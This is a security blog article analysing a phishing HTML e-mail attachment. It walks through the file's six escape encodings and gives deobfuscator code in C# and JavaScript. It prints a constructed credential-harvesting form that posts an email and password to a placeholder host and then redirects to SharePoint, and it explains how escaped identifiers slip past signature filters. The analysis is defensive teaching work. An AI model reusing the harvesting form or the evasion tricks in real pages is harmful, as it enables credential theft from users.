ethical.blue Magazine

// Cybersecurity clarified.

Phishing.HtmlDoc.Generic Sample Code Deobfuscation

2023-11-14   Dawid Farbaniec
...
Sally (Artificial Intelligence)

A malware sample named COR15.1A (2).html (14938 bytes) has visited the laboratory. The file was spread as an e-mail attachment. Its HTML markup and scripts are obfuscated, which sometimes lets such files pass through filters based on static analysis (rules). The checksum calculated for file identification is:

File: COR15.1A (2).html
Size: 14.59 KB (14938 bytes)
SHA-256: 72a230083a2942986f617d3553d8a12ca4d62fa8561d582afa12ed097dbfd699


Detection Ratio

Only 8 / 59 security vendors and no sandboxes flagged this file as malicious.

Reconnaissance

The infected web document (.html) is obfuscated using various character escape codes. In this form the HTML markup and JavaScript code are difficult to read and understand.

Looking at the whole document, we can see that six types of encoding are used. Take the letter A as an example. This ASCII character can be written as 65 (decimal), 41 (hexadecimal) or 101 (octal). To insert the letter A in HTML markup we can write the numeric character reference &#65; (decimal) or &#x41; (hexadecimal). In scripts we use escape sequences introduced by a backslash: \101 (octal), \x41 (hexadecimal) or \u0041 (Unicode). Octal and \x escapes are only valid inside string literals, but Unicode escapes are also legal inside identifiers, so (\u0064ocum\u0065n\u0074).write(); is parsed by the JavaScript engine as document.write(); and a filter that looks for the literal string "document.write" never sees it.

Another type of encoding used here is URL (percent) encoding: a % character followed by the hexadecimal value of the ASCII character. An obfuscated URL can look like https://ethical.blue/%41, which the server resolves to https://ethical.blue/A. Specific characters or even every character can be encoded this way, so https%3a%2f%2fethical.blue%2fA also decodes to https://ethical.blue/A. Note that a browser does not decode the scheme and separators of such a fully encoded string on its own; the script has to decode it first (for example with decodeURIComponent) before it can be used as a location or request URL, which is exactly why the decoded value only appears at run time.
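To make the six forms concrete, the following JavaScript is an added example (an editorial addition, not the magazine's tool and not code from the sample). It contains an encoder for each family, a single-pass decoder that reverses all of them, and a fixpoint loop for nested layers. The obfuscated fragment and the hostname api.example.invalid are constructed for the demonstration; the legacy octal rule (three digits only while the value stays below \377) is the one JavaScript itself applies.

```javascript
// Added example (editorial addition, not the magazine's tool): the six escape
// families found in the sample, an encoder that produces each of them and a
// decoder that reverses all of them in one pass. Input strings are constructed.

// Encoders, one per family. The sample uses them on plain ASCII, so only
// code points below 256 are handled here (octal and \x cannot express more).
const enc = {
  htmlDec: (s) => [...s].map((c) => `&#${c.charCodeAt(0)};`).join(''),
  htmlHex: (s) => [...s].map((c) => `&#x${c.charCodeAt(0).toString(16)};`).join(''),
  jsOct:   (s) => [...s].map((c) => `\\${c.charCodeAt(0).toString(8)}`).join(''),
  jsHex:   (s) => [...s].map((c) => `\\x${c.charCodeAt(0).toString(16).padStart(2, '0')}`).join(''),
  jsUni:   (s) => [...s].map((c) => `\\u${c.charCodeAt(0).toString(16).padStart(4, '0')}`).join(''),
  url:     (s) => [...s].map((c) => `%${c.charCodeAt(0).toString(16).padStart(2, '0')}`).join(''),
};

// One alternation, so the decoder consumes the text left to right and a decoded
// character is never re-read as the start of another escape in the same pass.
// The octal branch follows the JavaScript legacy rule: three digits only when the
// value stays below \377, so "\601" is \60 followed by a literal "1".
const ESCAPE_RE = /&#[xX]([0-9a-fA-F]{1,4});|&#([0-9]{1,5});|\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|\\([0-3][0-7]{0,2}|[4-7][0-7]?)|%([0-9a-fA-F]{2})/g;

function decodeOnce(text) {
  return text.replace(ESCAPE_RE, (_, hx, dec, uni, xhex, oct, pct) => {
    if (hx !== undefined) return String.fromCodePoint(parseInt(hx, 16));
    if (dec !== undefined) return String.fromCodePoint(parseInt(dec, 10));
    if (uni !== undefined) return String.fromCharCode(parseInt(uni, 16));
    if (xhex !== undefined) return String.fromCharCode(parseInt(xhex, 16));
    if (oct !== undefined) return String.fromCharCode(parseInt(oct, 8));
    return String.fromCharCode(parseInt(pct, 16));
  });
}

// Obfuscators nest layers (an HTML entity that decodes to a backslash that then
// starts a JavaScript escape), so repeat until the text stops changing.
function deobfuscate(text, maxRounds = 8) {
  for (let round = 0; round < maxRounds; round++) {
    const next = decodeOnce(text);
    if (next === text) return text;
    text = next;
  }
  return text;
}

// Why a signature-based filter misses this: Unicode escapes are legal inside a
// JavaScript identifier, so the engine resolves \u0073ink to sink before the
// call, exactly as \u0064ocum\u0065n\u0074.write() becomes document.write().
const sink = { write: (s) => s.toUpperCase() };
function callThroughEscapedIdentifier() {
  return \u0073ink.write('hidden'); // reads as sink.write('hidden')
}

// Constructed obfuscated fragment mixing all six families, as the sample does.
// api.example.invalid is a placeholder host, not the sample's infrastructure.
const OBFUSCATED = [
  '<script>',
  enc.jsUni('document') + '.write("' + enc.jsHex('<form') + enc.jsOct(' method=post>') + '");',
  'var api = "' + enc.url('https://api.example.invalid/login.php') + '";  // fully percent-encoded',
  '</script>',
  enc.htmlDec('<a href="') + enc.htmlHex('https://ethical.blue/A') + enc.htmlDec('">open</a>'),
].join('\n');

const CLEAN = deobfuscate(OBFUSCATED);
console.log(CLEAN);
```

The single alternation matters: decoding the families in separate passes, as a quick script tends to do, lets a character produced by one pass be swallowed by the next, while running one pass repeatedly until nothing changes handles genuinely nested layers in a controlled way.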

For automated URL decoding we can use for example Windows PowerShell (the System.Web assembly is not loaded by default in Windows PowerShell 5.1, hence the Add-Type line):
Add-Type -AssemblyName System.Web
[System.Web.HttpUtility]::UrlDecode('https://%65%74%68%69%63%61%6C%2E%62%6C%75%65');

Deobfuscator in C#.NET

After recognizing the repeating patterns in the obfuscated code, we can write a simple tool to clean up this sample.

/* Coded by ethical.blue Magazine. Cybersecurity clarified. */
using System;
using System.IO;
using System.Text.RegularExpressions;

internal class Program
{
    // Each of the first four passes rewrites one escape family into a numeric
    // HTML entity (&#x..;); the last two passes turn those entities into plain
    // characters. If the output still contains escapes (nested layers), run it again.
    internal static string Deobfuscate(string text)
    {
        // JavaScript legacy octal escape. Octal digits are 0-7 only: with [0-9]
        // a sequence such as \89 would make Convert.ToInt32(.., 8) throw.
        text = Regex.Replace(text, "\\\\([0-7]{1,3})", // \101
            m => "&#x" + Convert.ToString(Convert.ToInt32(m.Groups[1].Value, 8), 16) + ";");

        text = Regex.Replace(text, "\\\\u[0-9a-fA-F]{4}", // \u0041
            m => (m.Value.Replace("\\u", "&#x") + ";"));

        text = Regex.Replace(text, "\\\\x[0-9a-fA-F]{2}", // \x41
            m => (m.Value.Replace("\\x", "&#x") + ";"));

        text = Regex.Replace(text, "[%][0-9a-fA-F]{2}", // %41
            m => "&#x" + m.Value.TrimStart('%') + ";");

        // Hexadecimal numeric character reference. The pattern accepts &#X41; too,
        // so the capital X must be trimmed as well or Convert.ToInt32 throws.
        text = Regex.Replace(text, "&#[xX][0-9a-fA-F]{1,4};", // &#x41;
            m => Convert.ToChar(Convert.ToInt32(
                m.Value.TrimStart('&', '#', 'x', 'X').TrimEnd(';'), 16)).ToString());

        // Decimal numeric character reference.
        text = Regex.Replace(text, "&#[0-9]{1,4};", // &#65;
            m => Convert.ToChar(Convert.ToInt32(
                m.Value.TrimStart('&', '#').TrimEnd(';'), 10)).ToString());

        return text;
    }

    private static void Main(string[] args)
    {
        const string root = @"C:\DATA\Malware Analysis\";

        var clean = Deobfuscate(File.ReadAllText(Path.Combine(root, "sample.txt")));

        File.WriteAllText(Path.Combine(root, "sample_clean.txt"), clean);

        Console.WriteLine("Well done.");
    }
}

Deobfuscated Code Static Analysis (JavaScript Payload)

This sample is typical phishing malware embedded in an .html document. It imitates legitimate Microsoft services, but entering credentials will not unlock the document blurred in the background; that is just a picture.

After our deobfuscator has passed over the obfuscated code, we can easily read what happens here. An asynchronous call ($.ajax) sends the provided credentials to an API (a .php script) and then redirects the victim to legitimate Microsoft services (sharepoint.com) to mislead them.
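The following JavaScript is an added example (an editorial addition, not the magazine's code and not the sample's payload) of the triage step that follows deobfuscation: it pulls the indicators just described out of the cleaned document. CLEAN_SAMPLE is constructed to mirror the description above; the hostname phish.example.invalid and the collect.php path are placeholders, not the sample's real infrastructure, and the sharepoint.com URL stands for the redirect target mentioned in the text.

```javascript
// Added example (editorial addition, not the magazine's code): a triage pass over
// the deobfuscated document that pulls out the indicators the article describes:
// the $.ajax endpoint that receives the credentials, the redirect shown afterwards
// and the credential input field. CLEAN_SAMPLE is constructed; hostnames are placeholders.

const CLEAN_SAMPLE = `
<form id="f">
  <input type="email" name="email" value="victim@example.com">
  <input type="password" name="pass" placeholder="Password">
  <button type="submit">Unlock document</button>
</form>
<script>
$("#f").submit(function (e) {
  e.preventDefault();
  $.ajax({
    type: "POST",
    url: "https://phish.example.invalid/api/collect.php",
    data: { e: $("[name=email]").val(), p: $("[name=pass]").val() },
    complete: function () {
      window.location.href = "https://www.sharepoint.com/";
    }
  });
});
</script>`;

// Extract the pieces an analyst wants in the report. The regexes are meant for
// triage of already-deobfuscated text; they are not a JavaScript parser.
function extractIndicators(html) {
  const ind = { ajaxUrls: [], redirects: [], passwordFields: 0, formActions: [] };

  // $.ajax({ ... }) bodies, then the url: property inside each body.
  for (const m of html.matchAll(/\$\.ajax\s*\(\s*\{([\s\S]*?)\}\s*\)/g)) {
    const u = /\burl\s*:\s*["']([^"']+)["']/.exec(m[1]);
    if (u) ind.ajaxUrls.push(u[1]);
  }

  // location = / location.href = / location.replace( / location.assign(
  const redirectRe = /(?:window\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']|location\.(?:replace|assign)\s*\(\s*["']([^"']+)["']/g;
  for (const m of html.matchAll(redirectRe)) ind.redirects.push(m[1] ?? m[2]);

  ind.passwordFields = (html.match(/<input\b[^>]*\btype\s*=\s*["']?password["']?/gi) || []).length;

  for (const m of html.matchAll(/<form\b[^>]*\baction\s*=\s*["']([^"']+)["']/gi)) ind.formActions.push(m[1]);

  return ind;
}

function hostOf(u) {
  try { return new URL(u).hostname; } catch { return null; }
}

// Phishing-kit shape from the article: a password field, credentials posted to
// one host, and a redirect to a different (legitimate-looking) host right after.
function verdict(ind) {
  const exfil = [...new Set([...ind.ajaxUrls, ...ind.formActions].map(hostOf).filter(Boolean))];
  const redirect = [...new Set(ind.redirects.map(hostOf).filter(Boolean))];
  const reasons = [];
  if (ind.passwordFields > 0) reasons.push('collects a password');
  if (exfil.length) reasons.push(`posts credentials to ${exfil.join(', ')}`);
  if (redirect.some((h) => !exfil.includes(h))) reasons.push(`redirects to a different host (${redirect.join(', ')})`);
  return { suspicious: reasons.length >= 2, reasons };
}

const INDICATORS = extractIndicators(CLEAN_SAMPLE);
console.log(INDICATORS, verdict(INDICATORS));
```

The extracted endpoint host is the value worth blocking and reporting; the redirect host is a legitimate brand domain and must not end up on a blocklist, which is why the two are kept apart in the verdict.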

Summary

The general idea of this text is to provide educational value by walking through the deobfuscation of a real malware sample found in the wild.

Bibliography

File: COR15.1A (2).html
Size: 14.59 KB (14938 bytes)
SHA-256: 72a230083a2942986f617d3553d8a12ca4d62fa8561d582afa12ed097dbfd699